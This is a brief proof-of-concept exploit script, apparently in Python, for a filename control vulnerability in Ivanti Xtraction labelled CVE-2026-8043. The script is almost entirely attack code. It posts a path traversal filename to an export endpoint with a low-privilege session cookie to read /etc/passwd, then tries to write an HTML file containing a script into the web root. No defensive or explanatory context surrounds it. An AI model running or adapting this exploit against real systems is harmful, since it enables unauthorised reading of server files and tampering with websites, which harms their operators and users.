CVE-2026-8043 Ivanti Xtraction 文件名控制漏洞

import requests # Target configuration target_url = "http://target-ip/api/export" attacker_session = "valid_low_priv_session_cookie" # Payload to read sensitive file using path traversal # Attempting to read /etc/passwd traversal_payload = { "filename": "../../../etc/passwd", "format": "text" } # Payload to write arbitrary HTML to web root # Attempting to write a malicious HTML file write_payload = { "filename": "../../wwwroot/malicious.html", "content": "<script>alert('XSS');</script>" } headers = { "Cookie": f"session_id={attacker_session}" } # Send Path Traversal Request try: response_read = requests.post(target_url, data=traversal_payload, headers=headers) if response_read.status_code == 200: print("[+] File Read Successful:") print(response_read.text) except Exception as e: print(f"[-] Error during read attempt: {e}") # Send File Write Request try: response_write = requests.post(target_url, data=write_payload, headers=headers) if response_write.status_code == 200: print("[+] Malicious File Written Successfully.") except Exception as e: print(f"[-] Error during write attempt: {e}")